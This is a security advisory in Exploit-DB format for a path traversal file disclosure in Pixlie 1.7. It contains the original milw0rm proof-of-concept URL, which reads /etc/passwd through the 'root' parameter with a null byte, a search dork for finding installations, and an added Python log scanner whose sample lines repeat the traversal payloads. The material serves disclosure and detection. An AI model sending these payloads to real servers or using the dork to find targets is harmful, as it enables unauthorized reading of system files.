Vendor: Pixlie
By: Rizgar
CVSS: 7.5 (HIGH)
CWE: Remote File Disclosure
Product Name: Pixlie
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: NO
Year: 2007

Pixlie 1.7 Remote File Disclosure Vulnerability

Pixlie 1.7 is vulnerable to remote file disclosure. By manipulating the 'root' parameter of 'pixlie.php', an attacker can read sensitive files on the server, such as '/etc/passwd'.

Mitigation:

To mitigate this vulnerability, it is recommended to apply a patch provided by the vendor or upgrade to a newer version of the Pixlie script. It is also advised to restrict access to sensitive files and directories on the server.

Exploit-DB raw data:

Pixlie 1.7 Remote File Disclosure Vulnerability
-----------------------------------------------------------------------

Script : Pixlie 1.7

Version : 1.7

Site : http://www.pixlie.de/download.php

Founder : Rizgar

Contact : rizgar@linuxmail.org and irc.gigachat.net #kurdhack

Thanks : Kurdish Hackers Clan(Anti Fashist Group :P), PH(HERO) , ColdHackers(nice boys)

d0rk : "Pixlie - die kostenlose Bildergalerie"

-----------------------------------------------------------------------

look at pixlie.php


//$root = "/home/www/IhrBenutzer/html";



PoC :

http://www.example.com/pixlie.php?root=../../../../../etc/passwd%00

# milw0rm.com [2007-08-10]
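
Detection logic for the request pattern shown in the PoC above, added here as an example (it is not part of the original advisory or of Pixlie's code): it scans web server access log lines for pixlie.php requests whose 'root' parameter carries traversal sequences, a null byte or an absolute path, including percent-encoding nested more than once. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Client IP, request target and status from a combined-format access log line.
REQ = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e) so it cannot hide '..'."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def suspicious_root(value):
    """Return the reasons a 'root' value looks like a file-disclosure attempt."""
    v = decode_fully(value).replace("\\", "/")
    reasons = []
    if "\x00" in v:
        reasons.append("null byte")
    if ".." in v.split("/"):
        reasons.append("directory traversal")
    if v.startswith("/"):
        reasons.append("absolute path")
    return reasons

def scan(lines):
    """Return (ip, status, reasons) for pixlie.php requests with a suspicious 'root'."""
    hits = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/pixlie.php"):
            continue
        # parse_qsl already decodes one layer of percent-encoding.
        for key, val in parse_qsl(url.query, keep_blank_values=True):
            if key == "root" and (reasons := suspicious_root(val)):
                hits.append((m["ip"], int(m["status"]), reasons))
    return hits

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Aug/2007:12:00:01 +0000] "GET /pixlie.php?root=../../../../../etc/passwd%00 HTTP/1.1" 200 1530',
    '198.51.100.7 - - [10/Aug/2007:12:00:05 +0000] "GET /pixlie.php?root=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210',
    '192.0.2.44 - - [10/Aug/2007:12:01:10 +0000] "GET /pixlie.php?dir=holiday HTTP/1.1" 200 8042',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 deserves a closer look than a 404, since the response size in the same log line indicates whether file content was likely returned.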